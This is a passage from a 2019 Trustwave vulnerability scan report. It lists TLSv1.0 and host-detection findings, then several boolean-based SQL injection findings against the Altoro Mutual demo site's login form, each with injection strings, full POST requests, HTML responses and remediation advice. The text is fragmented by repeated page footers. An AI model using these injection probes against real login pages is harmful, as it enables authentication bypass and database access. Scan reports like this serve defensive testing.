hostname: crackme.trustwave.com
ip_address: 204.13.201.47
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 43 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
10 Unknown services found 0.0 Info Pass The finding reports all ports and protocols that couldn't be remotely
identified. Particular items may indicate uncommon but safe protocols
or in-house application that uses custom and/or proprietary protocol.
However they can as well indicate malicious activity (backdoors,
rootkits, any other types of malware). This finding is purely
informational.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
Unknown Service: transport protocol: tcp, port: 80, ssl: false, banner:
(N/A)
Unknown Service: transport protocol: tcp, port: 443, ssl: false, banner:
(N/A)
Remediation:
Review items mentioned in this finding one by one and ensure the
services are known and accounted for in your security plan.
1 Host Detected 0.0 Info Pass This host responded to network probes.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackmebank.campbell.devlab
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 44 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
2 Hostname Resolved 0.0 Info Pass This hostname was resolved to one or more IP addresses using DNS
resolution.
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Evidence:
hostname: crackmebank.campbell.devlab
ip_address: 10.76.128.61
cyclone.ciphertechs.com
CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
1 Hostname could not be 0.0 Low Fail This hostname's IP address could not be resolved using DNS resolution.
Resolved
CVSSv2: AV:N/AC:L/Au:N/C:N/I:N/A:N
Reference:
https://www3.trustwave.com/support/kb/KnowledgebaseArticle20965.a
spx
Remediation:
Make sure you have correctly entered the fully qualified domain name
for the host you are trying to scan. Consider working with your ISP (or
your IT network manager, if this is an internal scan) to validate that
DNS is configured correctly.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 45 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
cyclone.ciphertechs.com
CVSS Compliance
# CVE Number Vulnerability Severity Details
Score Status
This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
https://www.pcisecuritystandards.org/documents/Migrating_from_SSL_E
arly_TLS_Information%20Supplement_v1.pdf
https://www.pcisecuritystandards.org/pdfs/15_04_15%20PCI%20DSS%2
03%201%20Press%20Release.pdf
https://www.trustwave.com/Resources/SpiderLabs-Blog/Bring-Out-Your-
Dead--An-Update-on-the-PCI-relevance-of-
SSLv3/?page=1&year=0&month=0
https://www3.trustwave.com/support/vulnerabilitymanagement/tls/
Evidence:
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 46 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Remediation:
The server should be configured to disable the use of the TLSv1.0
protocol in favor of cryptographically stronger protocols such as
TLSv1.1 and TLSv1.2. For services that already support TLSv1.1 or
TLSv1.2, simply disabling the use of the TLSv1.0 protocol on this
service is sufficient to address this finding. Please note the port
associated with this finding. This finding may NOT be originating from
port 443, which is what most online testing tools check by default.
NOTE: as of June 30th, 2018, Risk Mitigation & Migration plans were not
considered a PCI exception to this finding: the instance of SSLv3 must
be remediated properly.
This service supports the use of the TLSv1.0 protocol. The TLSv1.0
protocol has known cryptographic weaknesses that can lead to the
compromise of sensitive data within an encrypted session. Additionally,
the PCI SSC and NIST have determined that the TLSv1.0 protocol no
longer meets the definition of strong cryptography.
CVSSv2: AV:N/AC:L/Au:N/C:C/I:C/A:C
Service: https
Application: apache:tomcat, apache:tomcat
Reference:
https://www.pcisecuritystandards.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 47 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Evidence:
Cipher Suite: TLSv1 : ECDHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES256-SHA
Cipher Suite: TLSv1 : ECDHE-RSA-AES128-SHA
Cipher Suite: TLSv1 : DHE-RSA-AES128-SHA
Remediation:
The server should be configured to disable the use of the TLSv1.0
protocol in favor of cryptographically stronger protocols such as
TLSv1.1 and TLSv1.2. For services that already support TLSv1.1 or
TLSv1.2, simply disabling the use of the TLSv1.0 protocol on this
service is sufficient to address this finding. Please note the port
associated with this finding. This finding may NOT be originating from
port 443, which is what most online testing tools check by default.
NOTE: as of June 30th, 2018, Risk Mitigation & Migration plans were not
considered a PCI exception to this finding: the instance of SSLv3 must
be remediated properly.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 48 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: http
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - http://demo.testfire.net:8080/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 49 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
True Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 6706
Date: Tue, 06 Aug 2019 04:33:42 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 50 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 51 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 52 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 53 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 54 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 55 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST http://demo.testfire.net:8080/doLogin HTTP/1.1
Origin: http://demo.testfire.net:8080
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 56 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:33:43 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 57 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 58 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 59 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 60 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 61 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 62 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 63 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 64 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 65 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net:8443/doLogin - passw
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 66 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D8+--+-&btnSubmit=Login
True Response: HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Language: en
Content-Length: 1004
Date: Tue, 06 Aug 2019 04:37:47 GMT
Connection: close
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 67 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=CHSuser&passw=%27+or+8%3D6+--+-&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:37:47 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 68 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 69 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 70 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 71 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 72 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 73 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 74 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 75 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 76 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net:8443/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 77 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 78 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 79 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 80 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<span id="_ctl0__ctl0_Content_Administration">
<br style="line-height: 10px;"/>
<b>ADMINISTRATION</b>
<ul class="sidebar">
<li><a href="/admin/admin.jsp"
>Edit Users</a></li>
</ul>
</span>
</td>
<!-- MEMBER TOC END -->
<td valign="top" colspan="3" class="bb">
<p>
Welcome to Altoro Mutual Online.
</p>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 81 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</select>
<input type="submit" id="btnGetAccount"
value=" GO ">
</td>
</tr>
<tr>
<td colspan="2"><span id="
_ctl0__ctl0_Content_Main_promo"><table width=590
border=0><tr><td><h2>Congratulations!
</h2></td></tr><tr><td>You have been pre-approved for an Altoro
Gold Visa with a credit limit of $10000!</td></tr><tr><td>Click <a
href='apply.jsp'>Here</a> to apply.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 82 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
|
<a id="HyperLink6" href="/index.jsp?content=security.htm"
>Security Statement</a>
|
<a id="HyperLink6" href="/status_check.jsp">Server Status
Check</a>
|
<a id="HyperLink6" href="/swagger/index.html">REST API</a>
|
© 2019 Altoro Mutual, Inc.
<span style="color:red;font-weight:bold;font-style:italic;float:right"
>This web application is open source!<span style="color:black;font-
style:italic;font-weight:normal;float:right"> <a href="https:
//github.com/AppSecDev/AltoroJ/">Get your copy from GitHub</a> and
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 83 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
False Request: POST https://demo.testfire.net:8443/doLogin HTTP/1.1
Origin: https://demo.testfire.net:8443
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 84 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
uid=%27+or+8%3D6+--+-&passw=Passwor1&btnSubmit=Login
False Response: HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Transfer-Encoding: chunked
Date: Tue, 06 Aug 2019 04:37:44 GMT
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
<link href="/style.css" rel="stylesheet" type="text/css" />
</head>
<body style="margin-top:5px;">
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 85 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 86 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 87 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 88 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 89 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</div>
<script type="text/javascript">
function setfocus() {
if (document.login.uid.value=="") {
document.login.uid.focus();
} else {
document.login.passw.focus();
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 90 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
function confirminput(myform) {
if (myform.uid.value.length && myform.
passw.value.length) {
return (true);
} else if (!(myform.uid.value.length)) {
myform.reset();
myform.uid.focus();
alert ("You must enter a valid username");
return (false);
} else {
myform.passw.focus();
alert ("You must enter a valid password");
return (false);
}
}
window.onload = setfocus;
</script>
</td>
</div>
</tr>
</table>
<div id="footer" style="width: 99%;">
<a id="HyperLink5" href="/index.jsp?content=privacy.htm">Privacy
Policy</a>
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 91 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 92 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
</body>
</html>
<!-- END FOOTER -->
Remediation:
This web site responded with content that suggests that the SQL
content injected was possibly interpreted by the SQL database engine,
indicating that the underlying web application may be vulnerable to
SQL Injection (SQLi). This vulnerability could be utilized by an attacker
to access, modify or delete sensitive information within the associated
database instance. Before accepting any user-supplied data, the
application should validate this data's format and reject any characters
that are not explicitly allowed (i.e. a white-list). This list should be as
restrictive as possible. This is particularly important when the original
source of data is beyond the control of the application.
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 93 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
CVSSv2: AV:N/AC:L/Au:N/C:P/I:P/A:P
Service: https
Reference:
https://www.owasp.org/index.php/Guide_to_SQL_Injection
https://www.owasp.org/index.php/SQL_Injection
Evidence:
DetectionDetails: Boolean based SQL vulnerability found
POST - https://demo.testfire.net/doLogin - uid
False Injection: ' or 8=6 -- -
True Injection: ' or 8=8 -- -
True and false injections produced different responses
True Request: POST https://demo.testfire.net/doLogin HTTP/1.1
Origin: https://demo.testfire.net
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/login.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
uid=%27+or+8%3D8+--+-&passw=Passwor1&btnSubmit=Login
Confidential Information: This document may contain information that is privileged, confidential or otherwise protected from disclosure. Copyright © 2019 Trustwave Holdings, Inc., All rights reserved.
Dissemination, distribution or copying of this document or the information herein is prohibited without prior permission of Trustwave and
Page 94 of 1637
JS Int-B Roles 08052019.
Report Date: 2019-08-06
<head>
<title>Altoro Mutual</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-
8859-1" />
